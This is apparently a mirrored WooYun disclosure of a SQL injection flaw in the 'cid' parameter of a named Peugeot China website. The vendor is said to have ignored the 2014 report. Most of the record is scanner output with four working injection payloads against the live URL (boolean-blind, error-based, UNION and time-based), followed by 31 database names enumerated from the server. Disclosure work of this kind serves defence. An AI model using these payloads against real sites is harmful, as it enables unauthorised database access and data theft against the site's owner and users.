WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
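2014-06-14: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2014-07-29: The vendor has actively ignored the vulnerability; details are disclosed to the public.
SQL injection
None.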
http://408.peugeot.com.cn/show.php?cid=57
Place: GET
Parameter: cid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=57' AND 5637=5637 AND 'eQJn'='eQJn

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cid=57' AND (SELECT 2660 FROM(SELECT COUNT(*),CONCAT(0x716d667371,(SELECT (CASE WHEN (2660=2660) THEN 1 ELSE 0 END)),0x717a7a6171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AIGk'='AIGk

    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: cid=-1158' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716d667371,0x4d7a727861627459666e,0x717a7a6171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cid=57' AND SLEEP(5) AND 'HBaU'='HBaU
---
available databases [31]:
[*] 2014happy
[*] 24hours
[*] 3015db
[*] 308
[*] 308powertogo
[*] 50db
[*] biaozhidashisai
[*] happy3008
[*] hei3008
[*] hobby
[*] information_schema
[*] lemans
[*] mysql
[*] performance_schema
[*] peugeot301
[*] peugeot408
[*] peugeot_2008_m
[*] peugeot_3008
[*] peugeot_3008_1year
[*] peugeot_3008_1year_m
[*] peugeot_3008_3D
[*] peugeot_3008_happy
[*] peugeot_408_jy
[*] peugeot_club_35group_2
[*] peugeot_cn
[*] puzzlegame
[*] rcz
[*] sport
[*] team
[*] test
[*] zhengyan
You know.
Unable to contact the vendor, or the vendor actively declined.